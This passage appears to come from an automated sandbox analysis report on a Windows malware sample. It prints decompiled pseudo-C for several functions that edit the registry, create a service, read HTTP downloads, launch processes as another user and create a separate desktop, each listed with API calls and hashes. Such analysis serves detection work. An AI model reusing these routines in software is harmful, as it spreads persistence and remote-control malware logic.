							goto L13;
						}
						_v756 = 1;
						_v764 = 0x64;
						if(RegQueryValueExW(_v776, StrChrW(0x7098c948, 0x43), 0,  &_v756,  &_v724,  &_v764) == 0) {
							_t70 =  *0x7098f588; // 0x79a25c
							if(lstrcmpiW( &_v728, _t70) == 0) {
								_v768 = _t104;
								_v760 = _t104;
								_v752 = 0;
								if(RegQueryValueExW(_v780, StrChrW(0x7098c924, 0x43), 0,  &_v760,  &_v752,  &_v768) == 0) {
									_v744 = 0x89;
									if(_v756 == 0x89 || RegSetValueExW(_v784, StrChrW(0x7098c924, 0x43), 0, _t104,  &_v744, _t104) == 0) {
										_v776 = 1;
									}
								}
							}
						}
						CloseHandle(_v776);
						if(_v772 != 0) {
							break;
						}
						L13:
						_t63 = _v760 + 1;
						_v760 = _t63;
					} while (_t63 < _v752);
					_t101 = _v768;
					goto L15;
				}
			}























                                                                                                        0x709845b6
                                                                                                        0x709845cc
                                                                                                        0x709845d3
                                                                                                        0x709845d7
                                                                                                        0x709845e3
                                                                                                        0x7098478f
                                                                                                        0x70984799
                                                                                                        0x70984799
                                                                                                        0x70984609
                                                                                                        0x7098460d
                                                                                                        0x70984611
                                                                                                        0x70984615
                                                                                                        0x70984621
                                                                                                        0x70984784
                                                                                                        0x70984789
                                                                                                        0x00000000
                                                                                                        0x70984633
                                                                                                        0x70984641
                                                                                                        0x70984645
                                                                                                        0x70984648
                                                                                                        0x70984663
                                                                                                        0x70984673
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70984691
                                                                                                        0x7098469d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709846ba
                                                                                                        0x709846c2
                                                                                                        0x709846d6
                                                                                                        0x709846dc
                                                                                                        0x709846ef
                                                                                                        0x70984708
                                                                                                        0x7098470c
                                                                                                        0x70984710
                                                                                                        0x70984720
                                                                                                        0x70984727
                                                                                                        0x7098472f
                                                                                                        0x70984752
                                                                                                        0x70984752
                                                                                                        0x7098472f
                                                                                                        0x70984720
                                                                                                        0x709846ef
                                                                                                        0x7098475f
                                                                                                        0x70984769
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098476b
                                                                                                        0x7098476f
                                                                                                        0x70984770
                                                                                                        0x70984774
                                                                                                        0x7098477e
                                                                                                        0x00000000
                                                                                                        0x70984783

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,00751780,00000000,000F003F,?), ref: 709845DB
                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 70984619
                                                                                                        • RegEnumKeyExW.ADVAPI32 ref: 7098466B
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001B,00000000), ref: 70984695
                                                                                                        • StrChrW.SHLWAPI(7098C948,00000043,00000000,?,?,00000000), ref: 709846CA
                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000), ref: 709846D2
                                                                                                        • lstrcmpiW.KERNEL32(?,0079A25C), ref: 709846E7
                                                                                                        • StrChrW.SHLWAPI(7098C924,00000043,00000000,?,?,00000000), ref: 70984714
                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000), ref: 7098471C
                                                                                                        • StrChrW.SHLWAPI(7098C924,00000043,00000000,00000004,00000001,00000004), ref: 70984740
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984748
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098475F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 70984789
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
                                                                                                        • String ID: d
                                                                                                        • API String ID: 678791777-2564639436
                                                                                                        • Opcode ID: aa2fdf187c0df02acbb503b5eaefb0c7f6bfa8dea09f0da82b2d1ec0b7a493af
                                                                                                        • Instruction ID: 91302be5fec184ecfb788934997a1358cb50f048c1c3deaa8cb0bd6fd80a0b92
                                                                                                        • Opcode Fuzzy Hash: aa2fdf187c0df02acbb503b5eaefb0c7f6bfa8dea09f0da82b2d1ec0b7a493af
                                                                                                        • Instruction Fuzzy Hash: 3151FAB2118305AFD301DF65CC84EABB7FDFB89748F10492DF69696290E774E9048B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709884F0, Relevance: 24.1, APIs: 16, Instructions: 139memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E709884F0(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _t7;
				struct HWND__* _t13;
				WCHAR* _t20;
				intOrPtr _t21;
				intOrPtr _t34;
				intOrPtr _t36;
				intOrPtr _t38;
				void* _t40;
				struct HINSTANCE__* _t46;
				struct HWND__* _t47;
				void* _t51;
				void* _t52;
				void* _t53;

				_t51 = __ebp;
				_t34 = _a8;
				if(_t34 == 0x275b || _t34 == 0x2755 || _t34 == 0x2ae1) {
					return 0;
				} else {
					_t46 = _a4;
					_t7 = E70985180(_t46, _t34);
					_t53 = _t52 + 8;
					_t40 = _t7;
					_push(_a20);
					_push(_a16);
					_push(_a12);
					if(_t40 == 0) {
						_t47 =  *0x7098f698(_t46, _t34);
					} else {
						_t47 = CreateDialogIndirectParamW(_t46, _t40, ??, ??, ??);
						HeapFree(GetProcessHeap(), 0, _t40);
					}
					if(_t47 == 0) {
						L17:
						return _t47;
					} else {
						SetWindowTextW(_t47, StrChrW(0x7098ce0c, 0));
						if(_t34 != 0x2872) {
							if(_t34 != 0x2768) {
								goto L17;
							} else {
								_t13 = GetDlgItem(_t47, 0x4e7d);
								_push(0);
								_push(0);
								if(_t13 == 0) {
									PostMessageW(_t47, 0x10, ??, ??);
									goto L17;
								} else {
									PostMessageW(_t13, 0xf5, ??, ??);
									return _t47;
								}
							}
						} else {
							if( *0x7098f564 != 0) {
								E70985640(_t51, 1);
								_t53 = _t53 + 4;
								ExitProcess(0);
							}
							_push(0);
							_push(StrChrW(0x7098c490, 0x2e));
							E70982960();
							_push(0);
							_push(StrChrW(0x7098cbb8, 0x50));
							_t20 = StrChrW(0x7098cb94, 0x55);
							_t36 =  *0x7098f5f4; // 0x1
							_t21 =  *0x7098f5e4; // 0xb52c80
							 *0x7098f5f0 = E70984F60(_t36, _t21, _t20);
							 *0x7098f5bc = E70983DC0();
							E70984FD0(0);
							if( *0x7098f55c != 0) {
								_t38 =  *0x7098f5e4; // 0xb52c80
								_push(0xffffffff);
								E70983760(_t38);
								ExitProcess(0);
							}
							 *0x7098f3c8 = _t47;
							CallWindowProcW(E70987D00, _t47, 0x83fc, GetWindowLongW(_t47, 0xfffffffc), 0);
							SetWindowLongW(_t47, 0xfffffffc, E70987D00);
							return _t47;
						}
					}
				}
			}
















                                                                                                        0x709884f0
                                                                                                        0x709884f1
                                                                                                        0x709884fb
                                                                                                        0x7098869e
                                                                                                        0x70988519
                                                                                                        0x7098851a
                                                                                                        0x70988521
                                                                                                        0x7098852e
                                                                                                        0x70988531
                                                                                                        0x70988537
                                                                                                        0x70988538
                                                                                                        0x70988539
                                                                                                        0x7098853c
                                                                                                        0x70988562
                                                                                                        0x7098853e
                                                                                                        0x70988549
                                                                                                        0x70988552
                                                                                                        0x70988552
                                                                                                        0x70988566
                                                                                                        0x70988693
                                                                                                        0x70988698
                                                                                                        0x7098856c
                                                                                                        0x7098857d
                                                                                                        0x70988589
                                                                                                        0x70988660
                                                                                                        0x00000000
                                                                                                        0x70988662
                                                                                                        0x70988668
                                                                                                        0x7098866e
                                                                                                        0x70988670
                                                                                                        0x70988674
                                                                                                        0x7098868d
                                                                                                        0x00000000
                                                                                                        0x70988676
                                                                                                        0x7098867c
                                                                                                        0x70988687
                                                                                                        0x70988687
                                                                                                        0x70988674
                                                                                                        0x7098858f
                                                                                                        0x70988596
                                                                                                        0x7098859a
                                                                                                        0x7098859f
                                                                                                        0x709885a4
                                                                                                        0x709885a4
                                                                                                        0x709885aa
                                                                                                        0x709885b5
                                                                                                        0x709885b6
                                                                                                        0x709885be
                                                                                                        0x709885c9
                                                                                                        0x709885d1
                                                                                                        0x709885d3
                                                                                                        0x709885da
                                                                                                        0x709885e6
                                                                                                        0x709885f2
                                                                                                        0x709885f7
                                                                                                        0x70988606
                                                                                                        0x70988608
                                                                                                        0x7098860e
                                                                                                        0x70988611
                                                                                                        0x7098861b
                                                                                                        0x7098861b
                                                                                                        0x70988626
                                                                                                        0x7098863e
                                                                                                        0x7098864c
                                                                                                        0x70988657
                                                                                                        0x70988657
                                                                                                        0x70988589
                                                                                                        0x70988566

                                                                                                        APIs
                                                                                                          • Part of subcall function 70985180: FindResourceW.KERNEL32(?,?,00000005), ref: 70985191
                                                                                                          • Part of subcall function 70985180: LoadResource.KERNEL32(?,00000000), ref: 709851A0
                                                                                                          • Part of subcall function 70985180: SizeofResource.KERNEL32(?,00000000), ref: 709851AE
                                                                                                          • Part of subcall function 70985180: LockResource.KERNEL32(00000000), ref: 709851B7
                                                                                                          • Part of subcall function 70985180: GetProcessHeap.KERNEL32(00000008,00000000), ref: 709851C6
                                                                                                          • Part of subcall function 70985180: HeapAlloc.KERNEL32(00000000), ref: 709851CD
                                                                                                          • Part of subcall function 70985180: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 709851D8
                                                                                                          • Part of subcall function 70985180: FreeResource.KERNEL32(00000000), ref: 70985207
                                                                                                        • CreateDialogIndirectParamW.USER32 ref: 70988540
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098854B
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70988552
                                                                                                        • StrChrW.SHLWAPI(7098CE0C,00000000), ref: 70988579
                                                                                                        • SetWindowTextW.USER32(00000000,00000000), ref: 7098857D
                                                                                                        • ExitProcess.KERNEL32 ref: 709885A4
                                                                                                        • StrChrW.SHLWAPI(7098C490,0000002E,00000000), ref: 709885B3
                                                                                                          • Part of subcall function 70982960: RtlZeroMemory.NTDLL(00000250,00000250), ref: 70982974
                                                                                                          • Part of subcall function 70982960: RtlZeroMemory.NTDLL(?,00000410), ref: 70982986
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C564,00000025,00B757B8,?,00000410,00000250,00000250), ref: 7098299F
                                                                                                          • Part of subcall function 70982960: wsprintfW.USER32 ref: 709829B0
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C550,00000025,7098C560,0000002A,?), ref: 709829D2
                                                                                                          • Part of subcall function 70982960: wsprintfW.USER32 ref: 709829D6
                                                                                                          • Part of subcall function 70982960: FindFirstFileW.KERNEL32(?,?), ref: 709829E8
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C548,0000002E), ref: 70982A0C
                                                                                                          • Part of subcall function 70982960: lstrcmpW.KERNEL32(?,00000000), ref: 70982A14
                                                                                                          • Part of subcall function 70982960: StrChrW.SHLWAPI(7098C540,0000002E), ref: 70982A21
                                                                                                          • Part of subcall function 70982960: lstrcmpW.KERNEL32(?,00000000), ref: 70982A29
                                                                                                          • Part of subcall function 70982960: lstrcatW.KERNEL32(?,?), ref: 70982A3C
                                                                                                          • Part of subcall function 70982960: FindNextFileW.KERNEL32(00000000,?), ref: 70982A95
                                                                                                          • Part of subcall function 70982960: FindClose.KERNEL32(00000000), ref: 70982AA4
                                                                                                        • StrChrW.SHLWAPI(7098CBB8,00000050,00000000), ref: 709885C7
                                                                                                        • StrChrW.SHLWAPI(7098CB94,00000055,00000000), ref: 709885D1
                                                                                                          • Part of subcall function 70983DC0: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 70983DDC
                                                                                                          • Part of subcall function 70983DC0: OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983DEC
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C90C,00000055,000F01FF), ref: 70983E13
                                                                                                          • Part of subcall function 70983DC0: OpenServiceW.ADVAPI32(00000000,00000000), ref: 70983E17
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C8E4,00000055,00B52CDA), ref: 70983E4D
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C8D0,00000073,00000000), ref: 70983E57
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C868,00000025,00000000), ref: 70983E61
                                                                                                          • Part of subcall function 70983DC0: wsprintfW.USER32 ref: 70983E6C
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C83C,00000055,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 70983E99
                                                                                                          • Part of subcall function 70983DC0: StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70983EA3
                                                                                                          • Part of subcall function 70983DC0: CreateServiceW.ADVAPI32(?,00000000), ref: 70983EAB
                                                                                                          • Part of subcall function 70984FD0: StrChrW.SHLWAPI(7098CA5C,00000052), ref: 70984FEC
                                                                                                          • Part of subcall function 70984FD0: StrChrW.SHLWAPI(7098CA4C,00000025,007488D8,00000000), ref: 70984FF7
                                                                                                          • Part of subcall function 70984FD0: wsprintfW.USER32 ref: 70985005
                                                                                                          • Part of subcall function 70984FD0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70985029
                                                                                                          • Part of subcall function 70984FD0: RegDeleteValueW.ADVAPI32(?,00B52CDA), ref: 7098504B
                                                                                                          • Part of subcall function 70984FD0: RegCloseKey.ADVAPI32(?), ref: 70985056
                                                                                                        • ExitProcess.KERNEL32 ref: 7098861B
                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 7098862C
                                                                                                        • CallWindowProcW.USER32(Function_00007D00,00000000,000083FC,00000000), ref: 7098863E
                                                                                                        • SetWindowLongW.USER32 ref: 7098864C
                                                                                                          • Part of subcall function 70983760: CreateEnvironmentBlock.USERENV ref: 70983791
                                                                                                          • Part of subcall function 70983760: RtlZeroMemory.NTDLL(?,00000044), ref: 709837AB
                                                                                                          • Part of subcall function 70983760: StrChrW.SHLWAPI(7098C678,00000057,?,00000044,?,00000000), ref: 709837BF
                                                                                                          • Part of subcall function 70983760: RtlZeroMemory.NTDLL(?,00000010), ref: 709837D0
                                                                                                          • Part of subcall function 70983760: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,00000010,?,00000000), ref: 70983800
                                                                                                          • Part of subcall function 70983760: Sleep.KERNEL32(000001F4,?,00000000), ref: 7098380B
                                                                                                          • Part of subcall function 70983760: DestroyEnvironmentBlock.USERENV(?), ref: 7098383E
                                                                                                          • Part of subcall function 70983760: CloseHandle.KERNEL32(00000000), ref: 70983844
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CreateMemoryProcessResource$FindHeapWindowZerowsprintf$CloseOpen$BlockEnvironmentExitFileFreeLongManagerServicelstrcmp$AllocCallDeleteDestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 1181730545-0
                                                                                                        • Opcode ID: 3c6ddeabbdaa38f344e409053d08be58fa2ac47d56cfe215da8110ce34a415de
                                                                                                        • Instruction ID: ce3f297e72e0eba5edc2372c46e80fbe2c730d81332332856c30b9a20a9dc401
                                                                                                        • Opcode Fuzzy Hash: 3c6ddeabbdaa38f344e409053d08be58fa2ac47d56cfe215da8110ce34a415de
                                                                                                        • Instruction Fuzzy Hash: E241ACB2658310AFD21057A6DC49F6F776CAB94716F204126FA02E63E0EB7598019AA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985900, Relevance: 21.1, APIs: 14, Instructions: 117memorynetworkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70985900(void* _a4, intOrPtr* _a8) {
				long _v4;
				void _v8;
				long* _v12;
				void* _v16;
				intOrPtr _v28;
				long _v32;
				void* _v44;
				int _v48;
				long _v60;
				int _t35;
				long _t40;
				void* _t44;
				long _t53;
				DWORD* _t54;

				_t54 = 0;
				_t53 = 0;
				_t44 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
				if(_t44 == 0) {
					 *_a8 = 0;
					return 0;
				} else {
					_v8 = 0;
					_v4 = 4;
					if(HttpQueryInfoW(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
						_v32 = 0;
						if(InternetReadFile(_v16, _t44, 0x1fff,  &_v32) != 0) {
							while(1) {
								_t35 = _v48;
								if(_t35 == 0) {
									goto L15;
								}
								if(_t54 > 0x100000) {
									if(_t53 != 0) {
										goto L13;
									}
									goto L14;
								} else {
									if(_t53 != 0) {
										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
										if(_t40 == 0) {
											L13:
											HeapFree(GetProcessHeap(), 0, _t53);
											L14:
											_t53 = 0;
											_t54 = 0;
										} else {
											goto L10;
										}
									} else {
										_t12 = _t54 + 1; // 0x20000014
										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
										L10:
										_t53 = _t40;
										RtlMoveMemory(_t53 + _t54, _t44, _v48);
										_t54 = _t54 + _v60;
										 *(_t53 + _t54) = 0;
										_v60 = 0;
										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
											continue;
										} else {
										}
									}
								}
								goto L15;
							}
						}
					}
					L15:
					HeapFree(GetProcessHeap(), 0, _t44);
					 *_v12 = _t53;
					return _t54;
				}
			}

















                                                                                                        0x70985914
                                                                                                        0x70985916
                                                                                                        0x70985921
                                                                                                        0x70985925
                                                                                                        0x70985a3f
                                                                                                        0x70985a4a
                                                                                                        0x7098592b
                                                                                                        0x70985940
                                                                                                        0x70985944
                                                                                                        0x70985954
                                                                                                        0x70985978
                                                                                                        0x70985984
                                                                                                        0x70985990
                                                                                                        0x70985990
                                                                                                        0x70985996
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709859a2
                                                                                                        0x70985a0d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709859a4
                                                                                                        0x709859a6
                                                                                                        0x709859c4
                                                                                                        0x709859cc
                                                                                                        0x70985a0f
                                                                                                        0x70985a15
                                                                                                        0x70985a1b
                                                                                                        0x70985a1b
                                                                                                        0x70985a1d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709859a8
                                                                                                        0x709859a8
                                                                                                        0x709859b1
                                                                                                        0x709859ce
                                                                                                        0x709859d3
                                                                                                        0x709859da
                                                                                                        0x709859df
                                                                                                        0x709859f2
                                                                                                        0x709859f7
                                                                                                        0x70985a07
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985a09
                                                                                                        0x70985a07
                                                                                                        0x709859a6
                                                                                                        0x00000000
                                                                                                        0x709859a2
                                                                                                        0x70985990
                                                                                                        0x70985984
                                                                                                        0x70985a1f
                                                                                                        0x70985a25
                                                                                                        0x70985a2f
                                                                                                        0x70985a3a
                                                                                                        0x70985a3a

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 70985918
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098591B
                                                                                                        • HttpQueryInfoW.WININET ref: 7098594C
                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 7098597C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,20000014), ref: 709859AE
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709859B1
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 709859C1
                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 709859C4
                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 709859DA
                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 709859FF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70985A12
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70985A15
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70985A22
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70985A25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 1362589046-0
                                                                                                        • Opcode ID: 6f99bdd210985e9d76c6974bcb536ce0ecef94cc6d5ee30f1445ffc4189d353c
                                                                                                        • Instruction ID: 2e1bc967e335a841726d825d5c69c93c61ffe0d8e0296f1c2b1a61e9b3e703f2
                                                                                                        • Opcode Fuzzy Hash: 6f99bdd210985e9d76c6974bcb536ce0ecef94cc6d5ee30f1445ffc4189d353c
                                                                                                        • Instruction Fuzzy Hash: 68317FB2218345ABD300DF96DC84F6B77ADFB88754F104A2DF956D3280DB34D9098A62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983A80, Relevance: 21.1, APIs: 14, Instructions: 99memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E70983A80(void* __ebp, void* _a4) {
				long _v4;
				void* _v8;
				int _v12;
				void* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				short* _t25;
				WCHAR* _t29;
				int _t36;
				intOrPtr _t37;
				void* _t41;
				void* _t50;
				signed int _t56;
				WCHAR* _t57;
				int* _t61;

				_t61 =  &_v12;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_t41 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
				_v8 = _t41;
				if(_t41 == 0) {
					L17:
					HeapFree(GetProcessHeap(), 0, _a4);
					goto L18;
				}
				_v4 = 0;
				_t25 = GetCommandLineW();
				_v12 = 0;
				_t50 = CommandLineToArgvW(_t25,  &_v12);
				if(_t50 == 0) {
					L16:
					HeapFree(GetProcessHeap(), 0, _t41);
					goto L17;
				}
				_t29 = _v20;
				if(_t29 <= 1) {
					L14:
					LocalFree(_t50);
					if(_v12 != 0) {
						_push( *_v4);
						E70983760(_t41);
					}
					goto L16;
				}
				_t56 = 1;
				do {
					if(_t56 >= _t29 - 1) {
						goto L8;
					}
					if(lstrcmpiW( *(_t50 + _t56 * 4), StrChrW(0x7098c530, 0x2d)) == 0) {
						_t57 =  *(_t50 + 4 + _t56 * 4);
						_v16 = 1;
						_t36 = PathIsRelativeW(_t57);
						_t37 =  *0x7098f5d0; // 0xb757b8
						if(_t36 == 0) {
							_t37 = 0x7098c560;
						}
						_push(_t57);
						_push(_t37);
						wsprintfW(_v24, StrChrW(0x7098c69c, 0x22));
						_t61 =  &(_t61[4]);
						L13:
						_t41 = _v16;
						goto L14;
					}
					_t29 = _v24;
					L8:
					_t56 = _t56 + 1;
				} while (_t56 < _t29);
				goto L13;
			}


















                                                                                                        0x70983a80
                                                                                                        0x70983a88
                                                                                                        0x70983ba9
                                                                                                        0x70983bae
                                                                                                        0x70983bae
                                                                                                        0x70983aa6
                                                                                                        0x70983aa8
                                                                                                        0x70983aae
                                                                                                        0x70983b97
                                                                                                        0x70983ba1
                                                                                                        0x00000000
                                                                                                        0x70983ba8
                                                                                                        0x70983ab5
                                                                                                        0x70983abd
                                                                                                        0x70983ac9
                                                                                                        0x70983ad7
                                                                                                        0x70983adb
                                                                                                        0x70983b84
                                                                                                        0x70983b90
                                                                                                        0x00000000
                                                                                                        0x70983b96
                                                                                                        0x70983ae1
                                                                                                        0x70983ae8
                                                                                                        0x70983b66
                                                                                                        0x70983b67
                                                                                                        0x70983b72
                                                                                                        0x70983b7a
                                                                                                        0x70983b7c
                                                                                                        0x70983b81
                                                                                                        0x00000000
                                                                                                        0x70983b72
                                                                                                        0x70983af7
                                                                                                        0x70983b00
                                                                                                        0x70983b05
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983b19
                                                                                                        0x70983b26
                                                                                                        0x70983b2b
                                                                                                        0x70983b33
                                                                                                        0x70983b3b
                                                                                                        0x70983b40
                                                                                                        0x70983b42
                                                                                                        0x70983b42
                                                                                                        0x70983b47
                                                                                                        0x70983b48
                                                                                                        0x70983b58
                                                                                                        0x70983b5e
                                                                                                        0x70983b61
                                                                                                        0x70983b61
                                                                                                        0x00000000
                                                                                                        0x70983b65
                                                                                                        0x70983b1b
                                                                                                        0x70983b1f
                                                                                                        0x70983b1f
                                                                                                        0x70983b20
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70983A9D
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70983AA0
                                                                                                        • GetCommandLineW.KERNEL32 ref: 70983ABD
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 70983AD1
                                                                                                        • StrChrW.SHLWAPI(7098C530,0000002D), ref: 70983B0E
                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 70983B15
                                                                                                        • PathIsRelativeW.SHLWAPI(?), ref: 70983B33
                                                                                                        • StrChrW.SHLWAPI(7098C69C,00000022,00B757B8,?), ref: 70983B50
                                                                                                        • wsprintfW.USER32 ref: 70983B58
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 70983B67
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70983B8D
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70983B90
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 70983B9E
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70983BA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess$CommandLine$AllocArgvLocalPathRelativelstrcmpiwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 3145760940-0
                                                                                                        • Opcode ID: 7dff3b0e10122d565f22661e742478265c63fc835b83ffe9902bfb6b0002b570
                                                                                                        • Instruction ID: 9a3295d914340edbb4bad5544717104404aa7a3362ddfe4d1ff87a445b5b6d07
                                                                                                        • Opcode Fuzzy Hash: 7dff3b0e10122d565f22661e742478265c63fc835b83ffe9902bfb6b0002b570
                                                                                                        • Instruction Fuzzy Hash: C53146B2518301AFD200DB99CC88B6AB7A8EB84715F108529F956D73D0E774E8048BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A5C0, Relevance: 21.1, APIs: 14, Instructions: 80threadsleepsynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E7098A5C0(int _a4) {
				void* _v0;
				void* _v4;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t5;
				struct HDESK__* _t7;
				struct HDESK__* _t14;
				void* _t16;

				if( *0x7098f2ac < 6 ||  *0x7098f5f4 != 0 ||  *0x7098f5f8 == 0) {
					if(_a4 == 0) {
						return _t5;
					} else {
						_a4 = 1;
						_t7 = GetThreadDesktop(GetCurrentThreadId());
						 *0x7098f534 = _t7;
						if(_t7 != 0) {
							_t7 = CreateDesktopW(StrChrW(0x7098cad4, 0x54), 0, 0, 0, 0x10000000, 0);
							 *0x7098f530 = _t7;
							if(_t7 != 0) {
								_t16 = CreateThread(0, 0, E70989B10, _v0, 0, 0);
								if(_t16 != 0) {
									WaitForSingleObject(_t16, 0xffffffff);
									CloseHandle(_t16);
